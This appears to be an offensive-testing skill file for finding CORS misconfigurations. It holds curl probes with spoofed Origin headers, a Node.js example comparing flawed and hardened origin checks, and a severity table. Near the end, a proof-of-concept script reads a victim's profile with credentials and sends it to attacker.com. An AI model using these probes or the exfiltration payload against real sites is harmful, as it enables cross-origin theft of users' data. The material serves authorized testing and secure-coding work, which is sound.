attack-cors
CORS misconfiguration testing — origin reflection, wildcard bypass, null origin, credential leakage
| Field | Value |
|---|---|
| name | attack-cors |
| description | CORS misconfiguration testing — origin reflection, wildcard bypass, null origin, credential leakage |
| category | web-application |
| version | 1.0 |
| author | cyberstrike-official |
| tags | ["cors","web","owasp","access-control","attack"] |
| tech_stack | ["web"] |
| cwe_ids | ["CWE-942","CWE-346"] |
| chains_with | ["attack-open-redirect","attack-idor-automation"] |
| prerequisites | [] |
| severity_boost | {"attack-open-redirect":"CORS + open redirect = token theft via cross-origin request"} |
Identify Cross-Origin Resource Sharing misconfigurations that allow unauthorized cross-origin access to sensitive data or APIs.
Test whether the server reflects arbitrary origins in Access-Control-Allow-Origin:

```bash
# Automated CORS checker (bundled script)
attack_script cors_checker https://TARGET/api/endpoint --json-output
```

Manual tests:

```bash
# Arbitrary origin
curl -s -H "Origin: https://evil.com" TARGET_URL -D- | grep -i "access-control"
# Subdomain bypass
curl -s -H "Origin: https://TARGET.evil.com" TARGET_URL -D-
# Null origin
curl -s -H "Origin: null" TARGET_URL -D-
# HTTP downgrade
curl -s -H "Origin: http://TARGET" TARGET_URL -D-
# Backtick bypass
curl -s -H "Origin: https://TARGET%60.evil.com" TARGET_URL -D-
# Underscore bypass
curl -s -H "Origin: https://TARGET_.evil.com" TARGET_URL -D-
# CRLF injection
curl -s -H "Origin: https://evil.com%0d%0a" TARGET_URL -D-
# Prefix matching bypass
curl -s -H "Origin: https://evil-TARGET" TARGET_URL -D-
```
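Each probe above corresponds to a specific mistake in how a server decides whether an Origin is trusted. The following Node.js module is an added example (not part of the attack-cors skill or its bundled script) that puts two common broken checks beside a hardened allowlist check and runs all three against the same probe origins. `target.example` stands in for TARGET and the allowlist contents are constructed; the check functions and `corsHeaders` helper are illustrative names, not an API from any library.

```javascript
// Added example, not part of the attack-cors skill: the origin-check mistakes
// that the probe origins detect, beside a hardened allowlist check.
// TARGET is stood in for by the constructed placeholder host target.example.
const TRUSTED_HOST = 'target.example';
const ALLOWLIST = new Set(['https://target.example', 'https://app.target.example']);

// Vulnerable pattern 1: substring match on the raw header. Anything that
// merely contains the trusted host is accepted, so the subdomain, prefix,
// backtick, underscore and HTTP-downgrade probes all pass.
function naiveAllowsOrigin(origin) {
  return typeof origin === 'string' && origin.includes(TRUSTED_HOST);
}

// Vulnerable pattern 2: regex anchored only at the start, dot unescaped.
// Rejects the plain http:// downgrade and "evil-TARGET", but still accepts
// any origin that *starts* with the trusted host.
function regexAllowsOrigin(origin) {
  return typeof origin === 'string' && /^https:\/\/target.example/.test(origin);
}

// Hardened: parse the Origin value with the WHATWG URL parser, require https,
// and compare the canonical serialization against an exact allowlist.
// Returns the canonical origin to echo, or null (fail closed). The literal
// "null" origin and malformed values (e.g. embedded CR/LF) never reach the
// allowlist comparison; anything that parses must match an entry exactly.
function strictAllowsOrigin(origin) {
  if (typeof origin !== 'string' || origin === 'null') return null;
  let url;
  try {
    url = new URL(origin);
  } catch (e) {
    return null;
  }
  if (url.protocol !== 'https:') return null;
  return ALLOWLIST.has(url.origin) ? url.origin : null;
}

// Response-header builder. Reflection is exactly this: a buggy check says yes
// and the raw Origin is echoed back with credentials enabled. With the strict
// check only canonical allowlisted origins are ever echoed, and Vary: Origin
// keeps a shared cache from handing one origin's answer to another.
function corsHeaders(origin, checkFn) {
  const allowed = checkFn(origin);
  if (!allowed) return {}; // no ACAO at all: the browser denies the read
  return {
    'Access-Control-Allow-Origin': typeof allowed === 'string' ? allowed : origin,
    'Access-Control-Allow-Credentials': 'true',
    'Vary': 'Origin',
  };
}

// The probe origins from the manual curl tests (constructed, TARGET substituted).
const PROBES = [
  'https://evil.com',                    // arbitrary origin
  'https://target.example.evil.com',     // subdomain bypass
  'null',                                // null origin
  'http://target.example',               // HTTP downgrade
  'https://target.example%60.evil.com',  // backtick bypass
  'https://target.example_.evil.com',    // underscore bypass
  'https://evil.com%0d%0a',              // CRLF injection
  'https://evil-target.example',         // prefix matching bypass
];

// Returns the probe origins a given check wrongly accepts.
function wronglyAccepted(checkFn) {
  return PROBES.filter((o) => Boolean(checkFn(o)));
}

if (typeof require !== 'undefined' && require.main === module) {
  const checks = { naiveAllowsOrigin, regexAllowsOrigin, strictAllowsOrigin };
  for (const [name, fn] of Object.entries(checks)) {
    console.log(`${name}: wrongly accepts ${JSON.stringify(wronglyAccepted(fn))}`);
  }
}
```

Running it shows the substring check accepting five of the eight probes and the start-anchored regex three, while the strict check accepts none and still admits the two allowlisted origins. The design point is that the server should compare a parsed, canonical origin against an exact set and echo only that canonical value; string containment, unanchored regexes and echoing the raw header are what turn a trust decision into origin reflection.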
If ACAO (Access-Control-Allow-Origin) reflects the attacker's origin and ACAC (Access-Control-Allow-Credentials) is `true`:

```html
<!-- PoC: reads victim data cross-origin -->
<script>
fetch('https://TARGET/api/user/profile', {
  credentials: 'include'
})
  .then(r => r.json())
  .then(d => fetch('https://attacker.com/log?data=' + btoa(JSON.stringify(d))))
</script>
```
| Condition | Severity |
|---|---|
| Arbitrary origin reflected + credentials allowed | Critical (P1) |
| Arbitrary origin reflected, no credentials | Medium (P3) |
| null origin accepted + credentials allowed | High (P2) |
| Subdomain origin reflected + credentials | High (P2) |
| Wildcard ACAO with credentials | Medium (P3) |
- Origin header
- Access-Control-Allow-Origin reflection
- Access-Control-Allow-Credentials: true
- attack_script cors_checker — automated multi-origin testing
- curl — manual header injection